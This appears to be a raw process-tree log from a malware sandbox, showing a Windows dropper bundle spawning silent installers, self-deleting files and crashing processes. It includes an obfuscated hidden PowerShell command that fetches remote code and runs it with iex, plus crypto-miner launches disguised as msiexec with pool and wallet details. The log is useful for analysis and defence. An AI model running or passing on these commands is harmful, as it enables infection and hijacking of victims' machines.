C:\Users\Admin\AppData\Local\Temp\b9-60467-baa-91f80-3f5075bb001ab\Supiladaevu.exe"C:\Users\Admin\AppData\Local\Temp\b9-60467-baa-91f80-3f5075bb001ab\Supiladaevu.exe"6⤵PID:5128
-
-
C:\Users\Admin\AppData\Local\Temp\61-0a5e3-aac-7a688-013cb5894e65a\Jyjaekofezhae.exe"C:\Users\Admin\AppData\Local\Temp\61-0a5e3-aac-7a688-013cb5894e65a\Jyjaekofezhae.exe"6⤵PID:4336
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ne4z41p5.yqq\md6_6ydj.exe & exit7⤵PID:7040
-
C:\Users\Admin\AppData\Local\Temp\ne4z41p5.yqq\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\ne4z41p5.yqq\md6_6ydj.exe8⤵PID:6832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ev0ot4x2.ndv\askinstall31.exe & exit7⤵PID:6828
-
C:\Users\Admin\AppData\Local\Temp\ev0ot4x2.ndv\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ev0ot4x2.ndv\askinstall31.exe8⤵PID:6720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ujqi54ed.10u\toolspab1.exe & exit7⤵PID:6696
-
C:\Users\Admin\AppData\Local\Temp\ujqi54ed.10u\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ujqi54ed.10u\toolspab1.exe8⤵PID:6880
-
C:\Users\Admin\AppData\Local\Temp\ujqi54ed.10u\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ujqi54ed.10u\toolspab1.exe9⤵PID:6936
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wasindux.sjn\setup_10.2_mix.exe & exit7⤵PID:6724
-
C:\Users\Admin\AppData\Local\Temp\wasindux.sjn\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\wasindux.sjn\setup_10.2_mix.exe8⤵PID:1864
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "9⤵PID:6236
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dmmojoc.s0y\GcleanerWW.exe /mixone & exit7⤵PID:5176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mn5gjfjm.0zr\app.exe /8-2222 & exit7⤵PID:7436
-
C:\Users\Admin\AppData\Local\Temp\mn5gjfjm.0zr\app.exeC:\Users\Admin\AppData\Local\Temp\mn5gjfjm.0zr\app.exe /8-22228⤵PID:7768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iwgzk1qw.4wy\file.exe & exit7⤵PID:7660
-
C:\Users\Admin\AppData\Local\Temp\iwgzk1qw.4wy\file.exeC:\Users\Admin\AppData\Local\Temp\iwgzk1qw.4wy\file.exe8⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:2312
-
C:\Users\Admin\AppData\Local\Temp\T19HGV1442\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T19HGV1442\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\T19HGV1442\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T19HGV1442\multitimer.exe" 1 3.1617397895.60678887c6159 10111⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\T19HGV1442\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T19HGV1442\multitimer.exe" 2 3.1617397895.60678887c615912⤵PID:1736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XRRP1A68EA\setups.exe"C:\Users\Admin\AppData\Local\Temp\XRRP1A68EA\setups.exe" ll10⤵PID:1044
-
C:\Users\Admin\AppData\Local\Temp\is-48GJC.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-48GJC.tmp\setups.tmp" /SL5="$802BC,635399,250368,C:\Users\Admin\AppData\Local\Temp\XRRP1A68EA\setups.exe" ll11⤵PID:7744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:7828
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:5348
-
C:\Users\Admin\AppData\Roaming\2491.tmp.exe"C:\Users\Admin\AppData\Roaming\2491.tmp.exe"10⤵PID:8384
-
C:\Users\Admin\AppData\Roaming\2491.tmp.exe"C:\Users\Admin\AppData\Roaming\2491.tmp.exe"11⤵PID:8980
-
-
-
C:\Users\Admin\AppData\Roaming\3694.tmp.exe"C:\Users\Admin\AppData\Roaming\3694.tmp.exe"10⤵PID:8792
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:7632
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:4428
-
-
-
C:\Users\Admin\AppData\Roaming\3D5B.tmp.exe"C:\Users\Admin\AppData\Roaming\3D5B.tmp.exe"10⤵PID:7380
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:4332
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:9176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵PID:184
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0z1igkyx.yph\Four.exe & exit7⤵PID:7612
-
C:\Users\Admin\AppData\Local\Temp\0z1igkyx.yph\Four.exeC:\Users\Admin\AppData\Local\Temp\0z1igkyx.yph\Four.exe8⤵PID:7824
-
C:\Users\Admin\AppData\Local\Temp\D2IUTTGCD4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\D2IUTTGCD4\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:6872
-
C:\Users\Admin\AppData\Local\Temp\D2IUTTGCD4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\D2IUTTGCD4\multitimer.exe" 1 3.1617397881.60678879b7548 10410⤵PID:8668
-
C:\Users\Admin\AppData\Local\Temp\D2IUTTGCD4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\D2IUTTGCD4\multitimer.exe" 2 3.1617397881.60678879b754811⤵PID:8616
-
C:\Users\Admin\AppData\Local\Temp\mesdmwej1ui\app.exe"C:\Users\Admin\AppData\Local\Temp\mesdmwej1ui\app.exe" /8-2312⤵PID:7500
-
-
C:\Users\Admin\AppData\Local\Temp\ui3oxqsq2uh\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ui3oxqsq2uh\Setup3310.exe" /Verysilent /subid=57712⤵PID:8300
-
-
C:\Users\Admin\AppData\Local\Temp\bkypsqhmtua\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\bkypsqhmtua\cpyrix.exe" /VERYSILENT12⤵PID:4404
-
-
C:\Users\Admin\AppData\Local\Temp\a3zk1aw02gl\zzkmgsu2wxn.exe"C:\Users\Admin\AppData\Local\Temp\a3zk1aw02gl\zzkmgsu2wxn.exe" /ustwo INSTALL12⤵PID:9168
-
-
C:\Users\Admin\AppData\Local\Temp\u0ox31b322t\vict.exe"C:\Users\Admin\AppData\Local\Temp\u0ox31b322t\vict.exe" /VERYSILENT /id=53512⤵PID:6492
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SA2BABUQNG\setups.exe"C:\Users\Admin\AppData\Local\Temp\SA2BABUQNG\setups.exe" ll9⤵PID:7756
-
C:\Users\Admin\AppData\Local\Temp\is-OHFNH.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-OHFNH.tmp\setups.tmp" /SL5="$70458,635399,250368,C:\Users\Admin\AppData\Local\Temp\SA2BABUQNG\setups.exe" ll10⤵PID:7404
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:5004
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:5776
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:1872
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:5132
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:1128
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:4616
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"3⤵PID:5384
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"4⤵PID:4732
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"4⤵PID:880
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"5⤵PID:8008
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"6⤵PID:7916
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui6⤵PID:5696
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe7⤵PID:4808
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 880 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"5⤵PID:2516
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 8806⤵
- Kills process with taskkill
PID:3868
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵PID:9052
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\XSE8W8QUZS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XSE8W8QUZS\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\XSE8W8QUZS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XSE8W8QUZS\multitimer.exe" 1 3.1617397748.606787f4c88b6 1035⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\XSE8W8QUZS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XSE8W8QUZS\multitimer.exe" 2 3.1617397748.606787f4c88b66⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\13f2vltck10\vict.exe"C:\Users\Admin\AppData\Local\Temp\13f2vltck10\vict.exe" /VERYSILENT /id=5357⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\is-UKHED.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-UKHED.tmp\vict.tmp" /SL5="$402AA,870426,780800,C:\Users\Admin\AppData\Local\Temp\13f2vltck10\vict.exe" /VERYSILENT /id=5358⤵PID:6392
-
C:\Users\Admin\AppData\Local\Temp\is-LTHA1.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-LTHA1.tmp\win1host.exe" 5359⤵PID:6496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qgynnqfj3pg\03c4go0b20e.exe"C:\Users\Admin\AppData\Local\Temp\qgynnqfj3pg\03c4go0b20e.exe" /ustwo INSTALL7⤵PID:6624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 6528⤵
- Program crash
PID:5684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 6688⤵
- Program crash
PID:6648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 6248⤵
- Program crash
PID:5360
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 6328⤵
- Program crash
PID:4868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 8928⤵
- Program crash
PID:1172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 9128⤵
- Program crash
PID:3596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 5608⤵
- Program crash
PID:5904
-
-
-
C:\Users\Admin\AppData\Local\Temp\pafji4qnkm5\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\pafji4qnkm5\Setup3310.exe" /Verysilent /subid=5777⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\is-T3CA6.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-T3CA6.tmp\Setup3310.tmp" /SL5="$A0246,138429,56832,C:\Users\Admin\AppData\Local\Temp\pafji4qnkm5\Setup3310.exe" /Verysilent /subid=5778⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\is-S6MQ4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-S6MQ4.tmp\Setup.exe" /Verysilent9⤵PID:6360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1bqaseap33d\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\1bqaseap33d\cpyrix.exe" /VERYSILENT7⤵PID:6320
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:6700
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"9⤵PID:4504
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:7004
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"9⤵PID:5192
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub9⤵PID:5416
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe10⤵PID:7840
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wctuwuxbwyb\app.exe"C:\Users\Admin\AppData\Local\Temp\wctuwuxbwyb\app.exe" /8-237⤵PID:6884
-
C:\Users\Admin\AppData\Local\Temp\wctuwuxbwyb\app.exe"C:\Users\Admin\AppData\Local\Temp\wctuwuxbwyb\app.exe" /8-238⤵PID:7800
-
-
-
C:\Users\Admin\AppData\Local\Temp\tohfl4r0bdf\vpn.exe"C:\Users\Admin\AppData\Local\Temp\tohfl4r0bdf\vpn.exe" /silent /subid=4827⤵PID:6792
-
C:\Users\Admin\AppData\Local\Temp\is-CI78U.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-CI78U.tmp\vpn.tmp" /SL5="$602DC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\tohfl4r0bdf\vpn.exe" /silent /subid=4828⤵PID:6808
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MGO7B9VCOB\setups.exe"C:\Users\Admin\AppData\Local\Temp\MGO7B9VCOB\setups.exe" ll4⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\is-LALDI.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-LALDI.tmp\setups.tmp" /SL5="$40416,635399,250368,C:\Users\Admin\AppData\Local\Temp\MGO7B9VCOB\setups.exe" ll5⤵PID:5896
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"3⤵PID:5280
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:1392
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:932
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-79C0A.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-79C0A.tmp\vict.tmp" /SL5="$102EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\r44xabshida\vict.exe" /VERYSILENT /id=5351⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\is-S10OF.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-S10OF.tmp\win1host.exe" 5352⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\bjqqf6K5D.exe"C:\Users\Admin\AppData\Local\Temp\bjqqf6K5D.exe"3⤵PID:5648
-
C:\Users\Admin\AppData\Local\Temp\bjqqf6K5D.exe"C:\Users\Admin\AppData\Local\Temp\bjqqf6K5D.exe"4⤵PID:5936
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 6443⤵
- Program crash
PID:3100
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BJ44A.tmp\hblihcar0lz.tmp"C:\Users\Admin\AppData\Local\Temp\is-BJ44A.tmp\hblihcar0lz.tmp" /SL5="$10306,2592217,780800,C:\Users\Admin\AppData\Local\Temp\sbsgvepdh2k\hblihcar0lz.exe" /VERYSILENT1⤵PID:5484
-
C:\Users\Admin\AppData\Local\Temp\is-0A3JG.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-0A3JG.tmp\winlthsth.exe"2⤵PID:6108
-
C:\Users\Admin\AppData\Local\Temp\DtH8EL9Dx.exe"C:\Users\Admin\AppData\Local\Temp\DtH8EL9Dx.exe"3⤵PID:2700
-
C:\Users\Admin\AppData\Local\Temp\DtH8EL9Dx.exe"C:\Users\Admin\AppData\Local\Temp\DtH8EL9Dx.exe"4⤵PID:312
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:6892
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:4848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BP8GD.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-BP8GD.tmp\vpn.tmp" /SL5="$102F4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\dnxuanf0xur\vpn.exe" /silent /subid=4821⤵PID:5476
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:5568
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:5388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:2544
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:5224
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:7244
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:7844
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5728
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 10DF68CA7BB47F3B2E5FEA874B5A63AF C2⤵PID:4488
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A0140441814137134C93AFE010DA256F2⤵PID:60
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\aca2a4186a60414a8a38750371f611f8 /t 2548 /p 21161⤵PID:5508
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2288
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7012
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6616
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7737dc1d-efd0-1b42-abab-682130366856}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:1796
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:3980
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7160
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6604
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7856
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4852
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:6904
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:2124
-
C:\Users\Admin\AppData\Local\Temp\D10E.exeC:\Users\Admin\AppData\Local\Temp\D10E.exe1⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\DE6D.exeC:\Users\Admin\AppData\Local\Temp\DE6D.exe1⤵PID:7600